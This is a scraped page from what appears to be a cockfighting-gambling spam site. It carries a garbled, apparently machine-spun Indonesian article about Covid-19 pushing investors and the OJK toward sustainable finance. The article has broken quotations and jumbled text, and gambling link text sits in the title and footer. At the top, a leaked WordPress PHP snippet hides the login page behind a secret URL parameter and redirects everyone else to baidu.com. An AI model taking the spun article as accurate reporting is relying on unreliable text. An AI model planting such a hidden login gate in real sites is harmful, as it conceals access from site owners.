//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Pandemi Covid-19 mengubah paradigma strategi penggalangan dana investor | download game adu ayam_s128live_situs sabung ayam online

Pandemi Covid-19 mengubah paradigma strategi penggalangan dana investor

Laporan Choirul Arifin, jurnalis Tribunnews.com, Jakarta-TRIBUNNEWS.COM, Jakarta-Akibat pandemi Covid-19, paradigma konsumen, pelaku usaha dan pemilik aset (investor) mengenai pentingnya bisnis yang bertanggung jawab kini telah berubah. . -Sekarang, banyak investor yang memikirkan kembali keputusan investasi dan metode alokasi modal mereka dengan mengambil keberlanjutan sebagai filosofi investasi mereka.

Ini dan roadmap pembiayaan OJK sedang memasuki tahap membangun ketahanan (2019-2024). -Membaca: Investasi kecil yang berkelanjutan, ini adalah opsi baru untuk menjaga bisnis tetap dalam pandemi-saat ini, industri jasa keuangan bertujuan untuk memperkuat manajemen risiko sosial dan lingkungan serta tata kelola perusahaan yang baik. Keuangan berkelanjutan tidak hanya perilaku area bisnis dan investasi tertentu (ceruk pasar), tetapi juga akan menjadi perilaku umum (normal baru).

Bagi dunia usaha dan pemilik aset, investasi berkelanjutan bukan hanya “investasi bahagia”, tetapi “normal baru”.

Baca: Pertamina Hulu Mahakam berinvestasi di tiga proyek gedung pameran 105 juta dolar AS- “Untuk dunia bisnis dan pemilik aset, investasi berkelanjutan lebih dari sekedar kesenangan investasi. Dia berkata:” Namun, ini adalah standar baru. “”

“Strategi dan inovasi diperlukan Untuk menjadikan keuangan berkelanjutan sebagai filosofi dan tujuan investasi dari aktivitas investasi “normal baru”. Presiden IBS Kusumaningtuti Sandriharmy Soetiono, SH, LL.M, Ph.D memberikan judul “Keuangan Berkelanjutan: Dari Niche to New Ucapan “normal. Acara webinar ini memaparkan bagaimana Otoritas Jasa Keuangan (OJK) mendukung keuangan berkelanjutan sebagai mainstream practice pasca pandemi Covid-19 untuk percepatan penguatan manajemen risiko sosial dan lingkungan serta tata kelola perusahaan.

Baca: Sadar investasi Q2 di bawah target, Kepala BKPM berjanji akan memberikan izin yang lebih longgar kepada investor

Leave a Comment

download game adu ayam_s128live_situs sabung ayam online